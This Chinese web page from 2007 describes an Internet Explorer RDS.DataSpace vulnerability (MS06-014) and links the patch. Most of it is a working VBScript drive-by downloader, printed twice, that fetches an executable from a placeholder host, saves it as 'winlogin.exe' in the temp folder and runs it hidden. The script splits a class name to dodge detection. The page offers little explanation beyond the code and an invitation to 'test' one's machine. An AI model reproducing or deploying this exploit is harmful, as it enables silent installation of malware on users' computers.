【最新漏洞】IE中使用Rds.DataSpace下载并运行病毒文件
更新时间:2007年02月23日 00:00:00 作者:
请执行下面的代码测试您的机器是否存在漏洞:
[Ctrl+A 全选 注:引入外部Js需再刷新一下页面才能执行]
补丁下载:http://www.microsoft.com/china/technet/Security/bulletin/ms06-014.mspx
相关病毒的vbs代码如下:
on error resume next
dl = "http://www.xxx.com/xxx.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="winlogin.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
[Ctrl+A 全选 注:引入外部Js需再刷新一下页面才能执行]
补丁下载:http://www.microsoft.com/china/technet/Security/bulletin/ms06-014.mspx
相关病毒的vbs代码如下:
复制代码 代码如下:
on error resume next
dl = "http://www.xxx.com/xxx.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="winlogin.exe"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
相关文章
一个加密JavaScript的开源工具PACKER2.0.2
一个加密JavaScript的开源工具PACKER2.0.2...2006-11-11
最新评论